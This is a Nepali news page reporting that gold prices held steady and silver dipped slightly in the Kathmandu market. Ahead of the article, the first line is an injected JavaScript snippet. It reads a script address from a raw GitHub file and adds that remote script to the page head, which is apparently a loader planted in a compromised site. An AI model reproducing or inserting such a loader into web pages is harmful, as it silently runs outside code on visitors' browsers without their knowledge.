;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सुनको मूल्य स्थिर, चाँदीको घट्यो – जुनेली न्युज
बिहिबार, असार १३, २०८२
  • होमपेज
  • सुनको मूल्य स्थिर, चाँदीको घट्यो
समाचार

सुनको मूल्य स्थिर, चाँदीको घट्यो

असोज ४,

काठमाडौं । नेपाली बजारमा आइतबार सुनको मूल्यस्थितर रहेको छ भने चाँदीको सामान्य गिरावट आएको छ । नेपाल सुनचाँदी व्यवसायी महासंघका अनुसार शुक्रबार तोलामा ९७ हजारमा कारोबार भएको छापावाल सुन आइतबार पनि सोही मूल्यमा कारोबार भएको हो ।

यस्तै तेजावी सुन तोलामा ९६ हजार ५०० रुपैयाँमा कारोबार भएको महासंघले जनाएको छ ।

यस्तै आइतबार चाँदी तोलामा १३१५ रुपैयाँमा काराबोर भएको छ । यसअघि शुक्रबार चाँदी तोलामा १३३० रुपैयाँमा कारोबार भएको थियो । पछिल्लो समय सुनको मूल्य सामान्य घटबढ हुँदै आएको छ तर मूल्य उच्च हुँदा कारोबार ठप्प रहेको व्यवसायीहरु बताउँछन् ।

फेसबुक प्रतिक्रियाहरु